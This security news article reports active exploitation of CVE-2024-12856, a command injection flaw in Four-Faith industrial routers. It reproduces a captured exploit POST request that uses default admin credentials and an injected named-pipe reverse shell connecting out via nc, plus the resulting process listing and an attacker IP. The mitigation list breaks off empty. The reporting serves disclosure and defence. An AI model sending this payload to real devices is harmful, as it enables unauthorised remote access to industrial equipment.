A significant post-authentication vulnerability affecting Four-Faith industrial routers has been actively exploited in the wild.
Assigned as CVE-2024-12856, this flaw allows attackers to execute unauthenticated remote command injections by leveraging the routers’ default credentials.
The vulnerability impacts at least two Four-Faith router models—F3x24 and F3x36.
It involves leveraging the /apply.cgi endpoint over HTTP by exploiting the adj_time_year parameter during system time modifications using the submit_type=adjust_sys_time action.
2024 MITRE ATT&CK Evaluation Results for SMEs & MSPs -> Download Free Guide
Attackers have been able to inject OS commands, which can be used to gain unauthorized remote access or launch reverse shells. A real-world example of the malicious payload sent via a POST request is as follows:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1:90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Length: 296
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time
Once injected, the attacker can execute commands. The running process on the vulnerable device may look like this:
20938 admin 1640 S sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20943 admin 1636 S /bin/sh -i
20945 admin 1636 S nc 192.168.1.206 1270
VulnCheck observed malicious activity from the IP address 178.215.238[.]91, attempting to exploit this vulnerability with a payload matching earlier patterns.
A related blog post from November 2024 also documented similar exploitation attempts, confirming this vulnerability’s active exploitation in the wild.
Organizations using Four-Faith routers are strongly encouraged to:
By addressing this vulnerability proactively, organizations can mitigate the risks posed by CVE-2024-12856.
Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free
Critical security vulnerabilities in Ubiquiti’s UniFi Protect surveillance ecosystem-one rated the maximum severity score of…
A critical security vulnerability in IXON’s widely used VPN client has exposed Windows, Linux, and…
Cisco has released security updates addressing a critical vulnerability in the Switch Integrated Security Features…
Microsoft has announced its support for the Agent2Agent (A2A) protocol, an open standard developed in…
Security researchers have uncovered two critical vulnerabilities in Radware’s Cloud Web Application Firewall (WAF) that…
ESET, a leading cybersecurity firm, has shed light on one particularly insidious scheme: fake calls…